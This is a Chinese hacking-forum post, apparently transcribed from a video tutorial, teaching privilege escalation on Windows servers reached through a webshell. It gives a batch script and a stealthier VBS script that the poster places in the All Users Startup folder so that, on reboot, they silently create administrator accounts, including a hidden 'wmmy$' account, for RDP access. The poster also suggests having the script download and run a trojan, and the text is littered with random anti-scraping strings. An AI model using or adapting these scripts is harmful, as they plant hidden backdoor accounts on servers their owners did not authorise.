|
  
- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15930
- 在线时间
- 175 小时
             
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是
- G* Z9 }* `: k+ s$ c启动 提权, C( q- ~. W8 P% F
C:\Docume~1\All Users\「开始」菜单\程序\启动9 o7 {. a; R' ]1 s( O1 J' v- P6 \
在这里必须有写入权限 否则此方法无效- z& P# T$ z+ C$ p5 C$ S6 Y9 q4 `: T
因为我是在网吧 这里显示不了路径
! A' A1 c$ y- X! q/ i我去服务器上演示给大家看
5 }7 \0 l! [- a9 K6 d5 x大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的 V2 z% s; l5 r4 c
文件 从而运行我们的文件# J/ T2 ^. b9 R
这里有两中方式 第一种是批处理
" `/ L S g( g+ e我们来看下目前 我机器上的用户组, k `& H$ [* A* e2 _2 S
目前我们没有521这个用户
8 U+ K' {' l7 t2 U9 k, x2 _9 z, C看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示
: \. M7 ^) f [7 W大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现 O. J3 A( I' r6 S: p. E
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的# Q( l1 z3 E( v) p
大家看 已经成功加入了WMMY用户
" d4 n6 N3 r u网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了, { s; N! i3 C. @7 a; D
当前终端服务端口: 3389
. B: p1 c( y8 J+ z% T! j5 q系统自动登录功能未开启 p* e1 \+ l( Q$ ^0 U" B6 ?
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了7 x0 n3 G- f# B2 S* d d9 M8 ~
C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
) e4 H# I1 f5 {5 R: S$ y$ Q0 H第一种隐蔽性太差 我们就用第二种吧- N% Q3 L. ^0 j; y: \
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去+ [3 v0 `8 R* E; H' s" e
从而取得了3389的登陆权限
- F9 [; c+ ~- C5 n' w! q其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
: t8 N9 ` J( w$ U基本原理都差不多 我就不多介绍了
4 v( o7 ^6 [' w0 h* C教程结束```
% d1 h3 H( c5 S& S1 C0 S3 P@echo off
3 d! P: A2 J5 A) c0 E0 o8 g% |net user 521 521 /add7 Z2 S+ K8 }* a
net localgroup administrators 521 /add% a7 ?8 T+ D7 ]: P) F3 \# l
4 [. E" M% L% e9 r- f* ]4 @
on Error Resume next
& t. s3 N* w# \set wshshell=createobject("wscript.shell")
9 ~6 h4 i' @+ c) ba=wshshell.run("net user wmmy$ 1227 /add",0)
3 ~( A& Y+ s. j6 oa=wshshell.run("net localgroup administrators wmmy$ /add",0)! W( |& m6 _( L' b, g
, n, K1 a# v; y2 n, C7 B) a+ h# p
) O$ g0 W' ~; Z1 \& W6 C7 J
点击下载
& z3 k5 |; H; p9 f |
-
2
评分人数
-
|